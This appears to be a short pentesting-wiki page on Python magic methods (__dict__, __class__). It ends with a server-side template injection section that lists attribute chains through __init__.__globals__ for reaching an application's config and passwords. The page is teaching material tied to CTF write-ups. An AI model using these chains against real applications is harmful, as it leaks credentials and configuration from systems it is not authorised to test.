59 lines
1.8 KiB
Markdown
59 lines
1.8 KiB
Markdown
# Magic Methods
|
|
|
|
## Class Methods
|
|
|
|
You can access the **methods** of a **class** using **\_\_dict\_\_.**
|
|
|
|
.png>)
|
|
|
|
You can access the functions
|
|
|
|
.png>)
|
|
|
|
## Object class
|
|
|
|
### **Attributes**
|
|
|
|
You can access the **attributes of an object** using **\_\_dict\_\_**. Example:
|
|
|
|
.png>)
|
|
|
|
### Class
|
|
|
|
You can access the **class** of an object using **\_\_class\_\_**
|
|
|
|
.png>)
|
|
|
|
You can access the **methods** of the **class** of an **object chainning** magic functions:
|
|
|
|
.png>)
|
|
|
|
## Server Side Template Injection
|
|
|
|
Interesting functions to exploit this vulnerability
|
|
|
|
```
|
|
__init__.__globals__
|
|
__class__.__init__.__globals__
|
|
```
|
|
|
|
Inside the response search for the application (probably at the end?)
|
|
|
|
Then **access the environment content** of the application where you will hopefully find **some passwords** of interesting information:
|
|
|
|
```
|
|
__init__.__globals__[<name>].config
|
|
__init__.__globals__[<name>].__dict__
|
|
__init__.__globals__[<name>].__dict__.config
|
|
__class__.__init__.__globals__[<name>].config
|
|
__class__.__init__.__globals__[<name>].__dict__
|
|
__class__.__init__.__globals__[<name>].__dict__.config
|
|
```
|
|
|
|
## More Information
|
|
|
|
* [https://rushter.com/blog/python-class-internals/](https://rushter.com/blog/python-class-internals/)
|
|
* [https://docs.python.org/3/reference/datamodel.html](https://docs.python.org/3/reference/datamodel.html)
|
|
* [https://balsn.tw/ctf\_writeup/20190603-facebookctf/#events](https://balsn.tw/ctf\_writeup/20190603-facebookctf/#events)
|
|
* [https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0](https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0) (events)
|